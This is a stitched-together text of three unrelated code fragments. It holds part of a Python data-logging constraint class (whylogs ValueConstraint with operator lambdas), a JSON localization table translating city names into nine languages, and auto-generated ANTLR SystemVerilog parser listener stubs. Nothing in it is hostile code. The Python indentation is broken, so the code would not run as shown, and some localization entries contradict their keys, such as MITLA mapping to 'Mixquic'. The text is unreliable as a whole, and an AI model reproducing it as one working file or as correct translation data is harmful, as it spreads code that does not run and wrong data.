    Op.EQ_SET: lambda f, ref_str_sketch, ref_num_sketch: lambda update_obj: round(
        theta_a_not_b().compute(getattr(update_obj, f)["string_theta"], ref_str_sketch).get_estimate(), 1
    )
    == round(theta_a_not_b().compute(getattr(update_obj, f)["number_theta"], ref_num_sketch).get_estimate(), 1)
    == round(theta_a_not_b().compute(ref_str_sketch, getattr(update_obj, f)["string_theta"]).get_estimate(), 1)
    == round(theta_a_not_b().compute(ref_num_sketch, getattr(update_obj, f)["number_theta"]).get_estimate(), 1)
    == 0.0,
    # IN: summary field is a member of the reference collection 'v'.
    Op.IN: lambda f, v: lambda s: getattr(s, f) in v,
    # CONTAIN: reference value 'v' is contained in the summary field.
    Op.CONTAIN: lambda f, v: lambda s: v in getattr(s, f),
}
_summary_funcs2 = {
    # functions that compare two summary fields.
    Op.LT: lambda f, f2: lambda s: getattr(s, f) < getattr(s, f2),
    Op.LE: lambda f, f2: lambda s: getattr(s, f) <= getattr(s, f2),
    Op.EQ: lambda f, f2: lambda s: getattr(s, f) == getattr(s, f2),
    Op.NE: lambda f, f2: lambda s: getattr(s, f) != getattr(s, f2),
    Op.GE: lambda f, f2: lambda s: getattr(s, f) >= getattr(s, f2),
    Op.GT: lambda f, f2: lambda s: getattr(s, f) > getattr(s, f2),
    # BTWN: field 'f' must lie between fields 'f2' and 'f3' (inclusive).
    Op.BTWN: lambda f, f2, f3: lambda s: getattr(s, f2) <= getattr(s, f) <= getattr(s, f3),
}
_multi_column_value_funcs = {
    # functions applied between values coming from two columns (v1 vs v2).
    Op.LT: lambda v2: lambda v1: v1 < v2,
    Op.LE: lambda v2: lambda v1: v1 <= v2,
    Op.EQ: lambda v2: lambda v1: v1 == v2,
    Op.NE: lambda v2: lambda v1: v1 != v2,
    Op.GE: lambda v2: lambda v1: v1 >= v2,
    # GT: assert the first column's value 'v1' is greater than the second's 'v2'.
    Op.GT: lambda v2: lambda v1: v1 > v2,
    Op.IN: lambda v2: lambda v1: v1 in v2,
    Op.NOT_IN: lambda v2: lambda v1: v1 not in v2,
    # NOTE(review): SUM is not curried like the others — it directly reduces an
    # iterable of column values in one step; confirm callers expect this shape.
    Op.SUM: lambda v: sum(v),
}
class ValueConstraint:
"""
ValueConstraints express a binary boolean relationship between an implied numeric value and a literal.
When associated with a ColumnProfile, the relation is evaluated for every incoming value that is processed by whylogs.
Parameters
----------
op : whylogs.proto.Op (required)
Enumeration of binary comparison operator applied between static value and incoming stream.
Enum values are mapped to operators like '==', '<', and '<=', etc.
value : (one-of)
When value is provided, regex_pattern must be None.
Static value to compare against incoming stream using operator specified in `op`.
regex_pattern : (one-of)
When regex_pattern is provided, value must be None.
Regex pattern to use when MATCH or NOMATCH operations are used.
apply_function:
To be supplied only when using APPLY_FUNC operation.
In case when the apply_function requires argument, to be supplied in the value param.
name : str
Name of the constraint used for reporting
verbose : bool
If true, log every application of this constraint that fails.
Useful to identify specific streaming values that fail the constraint.
"""
def __init__(self, op: Op, value=None, regex_pattern: str = None, apply_function=None, name: str = None, verbose=False):
    """Bind the comparison operator to its static operand and pre-build
    the evaluation function; see the class docstring for parameter rules."""
    self._name = name
    self._verbose = verbose
    self.op = op
    self.apply_function = apply_function
    # Running counters: how many values were seen / how many failed.
    self.total = 0
    self.failures = 0
    # apply_function and the APPLY_FUNC operator must be supplied together.
    if (apply_function is not None) != (self.op == Op.APPLY_FUNC):
        raise ValueError("A function must be provided if and only if using the APPLY_FUNC operator")
    # Likewise a set value and the IN operator must be supplied together.
    if isinstance(value, set) != (op == Op.IN):
        raise ValueError("Value constraint must provide a set of values for using the IN operator!")
    if self.op == Op.APPLY_FUNC:
        # Only named functions known at module scope are accepted, so the
        # constraint can later be referenced by function name (no lambdas).
        if apply_function.__name__ not in globals() or "lambda" in apply_function.__name__:
            raise ValueError("Cannot initialize constraint with APPLY_FUNC using an unknown function!")
        if value is not None:
            # Optional reference argument for the applied function,
            # validated/coerced before being bound.
            value = self.apply_func_validate(value)
        self.value = value
        self.func = _value_funcs[op](apply_function, value)
    elif value is not None and regex_pattern is None:
        # numeric value
        self.value = value
        self.func = _value_funcs[op](value)
    elif regex_pattern is not None and value is None:
        # Regex pattern
        self.regex_pattern = regex_pattern
        self.func = _value_funcs[op](re.compile(self.regex_pattern))
    else:
        raise ValueError("Value constraint must specify a numeric value or regex pattern, but not both")
@property
def name(self):
    """Readable name for reporting: the explicit name when one was given,
    otherwise "value <OP> <target>" where the target is the bound function
    name, the literal value, or the regex pattern."""
    if self._name:
        return self._name
    if self.op == Op.APPLY_FUNC:
        target = self.apply_function.__name__
    else:
        target = self.value if hasattr(self, "value") else self.regex_pattern
    return f"value {Op.Name(self.op)} {target}"
def update(self, v) -> bool:
    """Apply the constraint to a single incoming value.

    Increments the evaluation counter, and the failure counter when the
    value does not satisfy the constraint.

    :param v: incoming stream value
    :return: True when the value satisfies the constraint, False otherwise.
        (The original signature was annotated ``-> bool`` but returned
        None on every path; returning the result is backward-compatible.)
    """
    self.total += 1
    # Regex operators only apply to strings; any other type fails outright
    # without invoking the compiled pattern.
    if self.op in (Op.MATCH, Op.NOMATCH) and not isinstance(v, str):
        self.failures += 1
        if self._verbose:
            logger.info(f"value constraint {self.name} failed: value {v} not a string")
        return False
    if not self.func(v):
        self.failures += 1
        if self._verbose:
            logger.info(f"value constraint {self.name} failed on value {v}")
        return False
    return True
def apply_func_validate(self, value) -> str:
if not isinstance(value, str):
if self.apply_function == _matches_json_schema:
try:
value = json.dumps(value)
except (ValueError, TypeError):
raise | |
"ja_JP": "メルサ",
"ko_KR": "메르사",
"pl_PL": "Mersa",
"pt_BR": "Mersa",
"ru_RU": "Мэрса"
},
"MESEMBRIA": {
"de_DE": "Mesembria",
"es_ES": "Mesembria",
"fr_FR": "Mésembria",
"it_IT": "Mesembria",
"ja_JP": "メセンブリア",
"ko_KR": "메셈브리아",
"pl_PL": "Mesembria",
"pt_BR": "Mesembria",
"ru_RU": "Месембрия"
},
"METHONE": {
"de_DE": "Methone",
"es_ES": "Methone",
"fr_FR": "Methone",
"it_IT": "Methone",
"ja_JP": "メトニ ",
"ko_KR": "메토네",
"pl_PL": "Methone",
"pt_BR": "Modone",
"ru_RU": "Метони"
},
"METZ": {
"de_DE": "Metz",
"es_ES": "Metz",
"fr_FR": "Metz",
"it_IT": "Metz",
"ja_JP": "メッツ",
"ko_KR": "메스",
"pl_PL": "Metz",
"pt_BR": "Metz",
"ru_RU": "Мец"
},
"MEXICO_CITY": {
"de_DE": "Mexico City",
"es_ES": "Ciudad de México",
"fr_FR": "Mexico",
"it_IT": "Città del Messico",
"ja_JP": "メキシコシティ",
"ko_KR": "멕시코시티",
"pl_PL": "Meksyk",
"pt_BR": "Cidade do México",
"ru_RU": "Мехико"
},
"MHLAHLANDLELA": {
"de_DE": "Mhlahlandlela",
"es_ES": "Mhlahlandlela",
"fr_FR": "Mhlahlandlela",
"it_IT": "Mhlahlandlela",
"ja_JP": "ムフラフランドレラ",
"ko_KR": "음라란들레라",
"pl_PL": "Mhlahlandlela",
"pt_BR": "Mhlahlandlela",
"ru_RU": "Млаландлела"
},
"MIAM": {
"de_DE": "Miam",
"es_ES": "Miam",
"fr_FR": "Miam",
"it_IT": "Miam",
"ja_JP": "ミアム",
"ko_KR": "미암",
"pl_PL": "Miam",
"pt_BR": "Miam",
"ru_RU": "Миам"
},
"MIAMI": {
"de_DE": "Miami",
"es_ES": "Miami",
"fr_FR": "Miami",
"it_IT": "Miami",
"ja_JP": "マイアミ",
"ko_KR": "마이애미",
"pl_PL": "Miami",
"pt_BR": "Miami",
"ru_RU": "Майями"
},
"MIDDELBURG": {
"de_DE": "Middelburg",
"es_ES": "Middelburg",
"fr_FR": "Middelburg",
"it_IT": "Middelburg",
"ja_JP": "ミデルブルフ",
"ko_KR": "미델뷔르흐",
"pl_PL": "Middelburg",
"pt_BR": "Midelburgo",
"ru_RU": "Мидделбург"
},
"MIKISIW_WACIHK": {
"de_DE": "Mikisiwacîhk",
"es_ES": "Mikisiw-Wacîhk",
"fr_FR": "Mikisiw-Wacîhk",
"it_IT": "Mikisiw-Wacîhk",
"ja_JP": "ミキシウ・ワチク",
"ko_KR": "미키시우와치크",
"pl_PL": "Mikisiw-Wacîhk",
"pt_BR": "Mikisiw-Wacîhk",
"ru_RU": "Микисив-Вацик"
},
"MILETOS": {
"de_DE": "Milet",
"es_ES": "Mileto",
"fr_FR": "Milet",
"it_IT": "Mileto",
"ja_JP": "ミレトス",
"ko_KR": "밀레토스",
"pl_PL": "Mileto",
"pt_BR": "Miletos",
"ru_RU": "Милет"
},
"MINNEAPOLIS": {
"de_DE": "Minneapolis",
"es_ES": "Minneapolis",
"fr_FR": "Minneapolis",
"it_IT": "Minneapolis",
"ja_JP": "ミネアポリス",
"ko_KR": "미니애폴리스",
"pl_PL": "Minneapolis",
"pt_BR": "Minneapolis",
"ru_RU": "Миннеаполис"
},
"MIRANDA_DO_DOURO": {
"de_DE": "Miranda do Douro",
"es_ES": "Miranda do Douro",
"fr_FR": "Miranda do Douro",
"it_IT": "Miranda do Douro",
"ja_JP": "ミランダ・ド・ドウロ",
"ko_KR": "미란다도도우로",
"pl_PL": "Miranda do Douro",
"pt_BR": "Miranda do Douro",
"ru_RU": "Миранда-ду-Дору"
},
"MISKOLC": {
"de_DE": "Miskolc",
"es_ES": "Miskolc",
"fr_FR": "Miskolc",
"it_IT": "Miskolc",
"ja_JP": "ミシュコルツ",
"ko_KR": "미슈콜츠",
"pl_PL": "Miszkolc",
"pt_BR": "Miskolc",
"ru_RU": "Мишкольц"
},
"MISSANABIE": {
"de_DE": "Missanabie",
"es_ES": "Missanabie",
"fr_FR": "Missanabie",
"it_IT": "Missanabie",
"ja_JP": "ミッサナビー",
"ko_KR": "미사나비",
"pl_PL": "Missanabie",
"pt_BR": "Missanabie",
"ru_RU": "Миссанаби"
},
"MISSISSAUGA": {
"de_DE": "Mississauga",
"es_ES": "Mississauga",
"fr_FR": "Mississauga",
"it_IT": "Mississauga",
"ja_JP": "ミシサガ",
"ko_KR": "미시소거",
"pl_PL": "Mississauga",
"pt_BR": "Mississauga",
"ru_RU": "Миссиссога"
},
"MISTAHI_SIPIHK": {
"de_DE": "Mistahi-Sipihk",
"es_ES": "Mistahi-Sipihk",
"fr_FR": "Mistahi-Sipihk",
"it_IT": "Mistahi-Sipihk",
"ja_JP": "ミスタヒ・シピク",
"ko_KR": "미스타히스피크",
"pl_PL": "Mistahi-Sipihk",
"pt_BR": "Mistahi-Sipihk",
"ru_RU": "Мистахи-Сипик"
},
"MISTAWASIS": {
"de_DE": "Mistawasis",
"es_ES": "Mistawasis",
"fr_FR": "Mistawasis",
"it_IT": "Mistawasis",
"ja_JP": "ミスタワシス",
"ko_KR": "미스타와시스",
"pl_PL": "Mistawasis",
"pt_BR": "Mistawasis",
"ru_RU": "Миставасис"
},
"MITLA": {
"de_DE": "Mixquic",
"es_ES": "Mixquic",
"fr_FR": "Mixquic",
"it_IT": "Mixquic",
"ja_JP": "ミスキック",
"ko_KR": "믹스퀴크",
"pl_PL": "Mixquic",
"pt_BR": "Mixquic",
"ru_RU": "Миккик"
},
"MLAMBONGWENYA": {
"de_DE": "Mlambongwenya",
"es_ES": "Mlambongwenya",
"fr_FR": "Mlambongwenya",
"it_IT": "Mlambongwenya",
"ja_JP": "ムラムボングウェニア",
"ko_KR": "음람봉궨야",
"pl_PL": "Mlambongwenya",
"pt_BR": "Mlambongwenya",
"ru_RU": "Мламбонгвенья"
},
"MOCHA": {
"de_DE": "Mokka",
"es_ES": "Moca",
"fr_FR": "Mocha",
"it_IT": "Mocha",
"ja_JP": "モカ",
"ko_KR": "모카",
"pl_PL": "Mokka",
"pt_BR": "Moca",
"ru_RU": "Моха"
},
"MOHACS": {
"de_DE": "Mohács",
"es_ES": "Mohács",
"fr_FR": "Mohács",
"it_IT": "Mohács",
"ja_JP": "モハーチ",
"ko_KR": "모하치",
"pl_PL": "Mohacz",
"pt_BR": "Mohács",
"ru_RU": "Мохач"
},
"MOHENJO_DARO": {
"de_DE": "Mohenjo-Daro",
"es_ES": "Mohenjo-Daro",
"fr_FR": "Mohenjo-daro",
"it_IT": "Mohenjo-Daro",
"ja_JP": "モヘンジョ・ダロ",
"ko_KR": "모헨조다로",
"pl_PL": "Mohendżo-Daro",
"pt_BR": "Mohenjo-Daro",
"ru_RU": "Мохенджо-Даро"
},
"MOHENJO_DARO_1": {
"de_DE": "Mohenjo-Daro",
"es_ES": "Mohenjo-Daro",
"fr_FR": "Mohenjo-daro",
"it_IT": "Mohenjo-Daro",
"ja_JP": "モヘンジョ・ダロ",
"ko_KR": "모헨조다로",
"pl_PL": "Mohendżo-Daro",
"pt_BR": "Mohenjo-Daro",
"ru_RU": "Мохенджо-Даро"
},
"MOKPO": {
"de_DE": "Mokpo",
"es_ES": "Mokpo",
"fr_FR": "Mokpo",
"it_IT": "Mokpo",
"ja_JP": "木浦",
"ko_KR": "목포",
"pl_PL": "Mokpo",
"pt_BR": "Mokpo",
"ru_RU": "Мокпхо"
},
"MOLU_MAPU": {
"de_DE": "Molu Mapu",
"es_ES": "Molu Mapu",
"fr_FR": "Molu Mapu",
"it_IT": "Molu Mapu",
"ja_JP": "モル・マプ",
"ko_KR": "몰루 마푸",
"pl_PL": "Molu Mapu",
"pt_BR": "Molu Mapu",
"ru_RU": "Молу-Мапу"
},
"MOMPOS": {
"de_DE": "Mompós",
"es_ES": "Mompós",
"fr_FR": "Mompós",
"it_IT": "Mompós",
"ja_JP": "モンポス",
"ko_KR": "몸포스",
"pl_PL": "Mompós",
"pt_BR": "Mompós",
"ru_RU": "Момпос"
},
"MONASTIR": {
"de_DE": "Monastır",
"es_ES": "Monastir",
"fr_FR": "Monastir",
"it_IT": "Munastır",
"ja_JP": "モナスティル",
"ko_KR": "모나스티르",
"pl_PL": "Monastyr",
"pt_BR": "Monastir",
"ru_RU": "Монастир"
},
"MONCTON": {
"de_DE": "Moncton",
"es_ES": "Moncton",
"fr_FR": "Moncton",
"it_IT": "Moncton",
"ja_JP": "モンクトン",
"ko_KR": "멍크턴",
"pl_PL": "Moncton",
"pt_BR": "Moncton",
"ru_RU": "Монктон"
},
"MONS": {
"de_DE": "Mons",
"es_ES": "Mons",
"fr_FR": "Mons",
"it_IT": "Mons",
"ja_JP": "モンス",
"ko_KR": "몽스",
"pl_PL": "Mons",
"pt_BR": "Mons",
"ru_RU": "Монс"
},
"MONTELIMAR": {
"de_DE": "Montélimar",
"es_ES": "Montélimar",
"fr_FR": "Montélimar",
"it_IT": "Montélimar",
"ja_JP": "モンテリマール",
"ko_KR": "몽텔리마르",
"pl_PL": "Montélimar",
"pt_BR": "Montélimar",
"ru_RU": "Монтелимар"
},
"MONTPELLIER": {
"de_DE": "Montpellier",
"es_ES": "Montpellier",
"fr_FR": "Montpellier",
"it_IT": "Montpellier",
"ja_JP": "モンペリエ",
"ko_KR": "몽펠리에",
"pl_PL": "Montpellier",
"pt_BR": "Montpellier",
"ru_RU": "Монпелье"
},
"MONTREAL": {
"de_DE": "Montréal",
"es_ES": "Montréal",
"fr_FR": "Montréal",
"it_IT": "Montréal",
"ja_JP": "モントリオール",
"ko_KR": "몬트리올",
"pl_PL": "Montreal",
"pt_BR": "Montreal",
"ru_RU": "Монреаль"
},
"MONTROSE": {
"de_DE": "Montrose",
"es_ES": "Montrose",
"fr_FR": "Montrose",
"it_IT": "Montrose",
"ja_JP": "モントローズ",
"ko_KR": "몬트로즈",
"pl_PL": "Montrose",
"pt_BR": "Montrose",
"ru_RU": "Монтроуз"
},
"MONTSERRAT": {
"de_DE": "Montserrat",
"es_ES": "Montserrat",
"fr_FR": "Montserrat",
"it_IT": "Montserrat",
"ja_JP": "モントセラト",
"ko_KR": "몬세라트",
"pl_PL": "Montserrat",
"pt_BR": "Montserrat",
"ru_RU": "Монтсеррат"
},
"MOOSOMIN": {
"de_DE": "Moosomin",
"es_ES": "Moosomin",
"fr_FR": "Moosomin",
"it_IT": "Moosomin",
"ja_JP": "ムーソミン",
"ko_KR": "무소민",
"pl_PL": "Moosomin",
"pt_BR": "Moosomin",
"ru_RU": "Мусомин"
},
"MOPTI": {
"de_DE": "Mopti",
"es_ES": "Mopti",
"fr_FR": "Mopti",
"it_IT": "Mopti",
"ja_JP": "モプティ",
"ko_KR": "몹티",
"pl_PL": "Mopti",
"pt_BR": "Mopti",
"ru_RU": "Мопти"
},
"MORIOKA": {
"de_DE": "Morioka",
"es_ES": "Morioka",
"fr_FR": "Morioka",
"it_IT": "Morioka",
"ja_JP": "盛岡",
"ko_KR": "모리오카",
"pl_PL": "Morioka",
"pt_BR": "Morioka",
"ru_RU": "Мориока"
},
"MORON": {
"de_DE": "Mörön",
"es_ES": "Mörön",
"fr_FR": "Mörön",
"it_IT": "Mörön",
"ja_JP": "ムルン",
"ko_KR": "므릉",
"pl_PL": "Mörön",
"pt_BR": "Mörön",
"ru_RU": "Мурэн"
},
"MOSCOW": {
"de_DE": "Moskau",
"es_ES": "Moscú",
"fr_FR": "Moscou",
"it_IT": "Mosca",
"ja_JP": "モスクワ",
"ko_KR": "모스크바",
"pl_PL": "Moskwa",
"pt_BR": "Moscou",
"ru_RU": "Москва"
},
"MOSTER": {
"de_DE": "Moster",
"es_ES": "Moster",
"fr_FR": "Mostar",
"it_IT": "Moster",
"ja_JP": "モスター",
"ko_KR": "모스테르",
"pl_PL": "Moster",
"pt_BR": "Moster",
"ru_RU": "Мостер"
},
"MOTAKIORA": {
"de_DE": "Motakiora",
"es_ES": "Motakiora",
"fr_FR": "Motakiora",
"it_IT": "Motakiora",
"ja_JP": "モタキオラ",
"ko_KR": "모타키오라",
"pl_PL": "Motakiora",
"pt_BR": "Motakiora",
"ru_RU": "Мотакиора"
},
"MOTUPOHUE": {
"de_DE": "Motupōhue",
"es_ES": "Motupōhue",
"fr_FR": "Motupōhue",
"it_IT": "Motupōhue",
"ja_JP": "モトゥポフエ",
"ko_KR": "모투포후에",
"pl_PL": "Motupōhue",
"pt_BR": "Motupōhue",
"ru_RU": "Мотупоху"
},
"MOUNT_ATHOS": {
"de_DE": "Berg Athos",
"es_ES": "Monte Athos",
"fr_FR": "Athos",
"it_IT": "Monte Athos",
"ja_JP": "アトス山",
"ko_KR": "아토스산",
"pl_PL": "Athos",
"pt_BR": "Monte Atos",
"ru_RU": "Афон"
},
"MPINDA": {
"de_DE": "Mpinda",
"es_ES": "Mpinda",
"fr_FR": "Mpinda",
"it_IT": "Mpinda",
"ja_JP": "ムピンダ",
"ko_KR": "음판다",
"pl_PL": "Mpinda",
"pt_BR": "Mpinda",
"ru_RU": "Мпинда"
},
"MTHATHA": {
"de_DE": "Mthatha",
"es_ES": "Mthatha",
"fr_FR": "Mthatha",
"it_IT": "Mthatha",
"ja_JP": "ウムタタ",
"ko_KR": "음타타",
"pl_PL": "Mthatha",
"pt_BR": "Mthatha",
"ru_RU": "Мтата"
},
"MTHONJANENI": {
"de_DE": "Mthonjaneni",
"es_ES": "Mthonjaneni",
"fr_FR": "Mthonjaneni",
"it_IT": "Mthonjaneni",
"ja_JP": "ムソンジャネニ",
"ko_KR": "음톤자네니",
"pl_PL": "Mthonjaneni",
"pt_BR": "Mthonjaneni",
"ru_RU": "Мтонджанени"
},
"MTSKHETA": {
"de_DE": "Mzcheta",
"es_ES": "Mtskheta",
"fr_FR": "Mtskheta",
"it_IT": "Mtskheta",
"ja_JP": "ムツヘタ",
"ko_KR": "음츠케타",
"pl_PL": "Mccheta",
"pt_BR": "Mtscheta",
"ru_RU": "Мцхета"
},
"MTUBATUBA": {
"de_DE": "Mtubatuba",
"es_ES": "Mtubatuba",
"fr_FR": "Mtubatuba",
"it_IT": "Mtubatuba",
"ja_JP": "ムトゥバトゥバ",
"ko_KR": "음투바투바",
"pl_PL": "Mtubatuba",
"pt_BR": "Mtubatuba",
"ru_RU": "Мтубатуба"
},
"MTUNZINI": {
"de_DE": "Mtunzini",
"es_ES": "Mtunzini",
"fr_FR": "Mtunzini",
"it_IT": "Mtunzini",
"ja_JP": "ムツンジニ",
"ko_KR": "음툰지니",
"pl_PL": "Mtunzini",
"pt_BR": "Mtunzini",
"ru_RU": "Мтунзини"
},
"MTW": {
"de_DE": "Mtw",
"es_ES": "Mtw",
"fr_FR": "Mtw",
"it_IT": "Mtw",
"ja_JP": "ムトゥウ",
"ko_KR": "모티아",
"pl_PL": "Mtw",
"pt_BR": "Mtw",
"ru_RU": "Берит"
},
"MUANG_TAM": {
"de_DE": "Muang Tam",
"es_ES": "Muang Tam",
"fr_FR": "Muang Tam",
"it_IT": "Muang Tam",
"ja_JP": "ムアン・タム",
"ko_KR": "무앙 탐",
"pl_PL": "Muang Tam",
"pt_BR": "Muang Tam",
"ru_RU": "Муанг Там"
},
"MULUMBI": {
"de_DE": "Mulumbi",
"es_ES": "Mulumbi",
"fr_FR": "Mulumbi",
"it_IT": "Mulumbi",
"ja_JP": "ムルンビ",
"ko_KR": "뮬움비",
"pl_PL": "Mulumbi",
"pt_BR": "Mulumbi",
"ru_RU": "Мулумби"
},
"MUMBAI": {
"de_DE": "Mumbai",
"es_ES": "Bombay",
"fr_FR": "Bombay ",
"it_IT": "Mumbai",
"ja_JP": "ムンバイ",
"ko_KR": "뭄바이",
"pl_PL": "Bombaj",
"pt_BR": "Mumbai",
"ru_RU": "Мумбаи"
},
"MUNICH": {
"de_DE": "München",
"es_ES": "Múnich",
"fr_FR": "Munich",
"it_IT": "Monaco",
"ja_JP": "ミュンヘン",
"ko_KR": "뮌헨",
"pl_PL": "Monachium",
"pt_BR": "Munique",
"ru_RU": "Мюнхен"
},
"MUNSTER": {
"de_DE": "Münster",
"es_ES": "Münster",
"fr_FR": "Münster",
"it_IT": "Münster",
"ja_JP": "ミュンスター",
"ko_KR": "먼스터",
"pl_PL": "Munster",
"pt_BR": "Münster",
"ru_RU": "Мюнстер"
},
"MURCIA": {
"de_DE": "Murcia",
"es_ES": "Murcia",
"fr_FR": "Murcie",
"it_IT": "Murcia",
"ja_JP": "ムルシア",
"ko_KR": "무르시아",
"pl_PL": "Murcia",
"pt_BR": "Murcia",
"ru_RU": "Мурсия"
},
"MUSAWWARAT_ES_SUFRA": {
"de_DE": "Musawwarat es-Sufra",
"es_ES": "Musawwarat es-Sufra",
"fr_FR": "Musawwarat es-Sufra",
"it_IT": "Musawwarat es-Sufra",
"ja_JP": "ムサワラット・エス・スフラ",
"ko_KR": "무사와라 에 수프라",
"pl_PL": "Al-Musawwarat as-Safra",
"pt_BR": "Musawwarat es-Sufra",
"ru_RU": "Мусавварат-эс-Суфра"
},
"MUSCAT": {
"de_DE": "Maskat",
"es_ES": "Mascate",
"fr_FR": "Mascate",
"it_IT": "Mascate",
"ja_JP": "マスカット",
"ko_KR": "무스카트",
"pl_PL": "Maskat",
"pt_BR": "Mascate",
"ru_RU": "Маскат"
},
"MUTSO": {
"de_DE": | |
# NOTE: auto-generated ANTLR listener stubs. Each enter/exit pair is a
# deliberate no-op hook for one grammar rule; subclasses override only
# the callbacks they need.
# Enter a parse tree produced by SystemVerilogParser#list_of_cross_items.
def enterList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#list_of_cross_items.
def exitList_of_cross_items(self, ctx:SystemVerilogParser.List_of_cross_itemsContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#cross_item.
def enterCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#cross_item.
def exitCross_item(self, ctx:SystemVerilogParser.Cross_itemContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#cross_body.
def enterCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#cross_body.
def exitCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#cross_body_item.
def enterCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#cross_body_item.
def exitCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
    pass
# Generated no-op listener stubs (ANTLR listener pattern); override in a subclass.
# Enter a parse tree produced by SystemVerilogParser#bins_selection_or_option.
def enterBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#bins_selection_or_option.
def exitBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#bins_selection.
def enterBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#bins_selection.
def exitBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#select_expression.
def enterSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#select_expression.
def exitSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#select_condition.
def enterSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#select_condition.
def exitSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#bins_expression.
def enterBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#bins_expression.
def exitBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
    pass
# Generated no-op listener stubs (ANTLR listener pattern); override in a subclass.
# Enter a parse tree produced by SystemVerilogParser#covergroup_range_list.
def enterCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_range_list.
def exitCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_value_range.
def enterCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_value_range.
def exitCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#with_covergroup_expression.
def enterWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#with_covergroup_expression.
def exitWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#set_covergroup_expression.
def enterSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#set_covergroup_expression.
def exitSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
def enterInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
def exitInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#cross_set_expression.
def enterCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#cross_set_expression.
def exitCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
    pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_expression.
def enterCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
    pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_expression.
def exitCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
    pass
    # NOTE: ANTLR-generated no-op listener stubs for the SystemVerilog
    # `let` construct grammar rules (declaration, ports, expression,
    # arguments); subclasses override these to act on the parse tree.
    # Enter a parse tree produced by SystemVerilogParser#let_declaration.
    def enterLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_declaration.
    def exitLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_identifier.
    def enterLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_identifier.
    def exitLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_port_list.
    def enterLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_port_list.
    def exitLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_port_item.
    def enterLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_port_item.
    def exitLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_formal_type.
    def enterLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_formal_type.
    def exitLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
        pass

    # Enter a parse tree produced by SystemVerilogParser#let_expression.
    def enterLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
        pass

    # Exit a parse tree produced by SystemVerilogParser#let_expression.
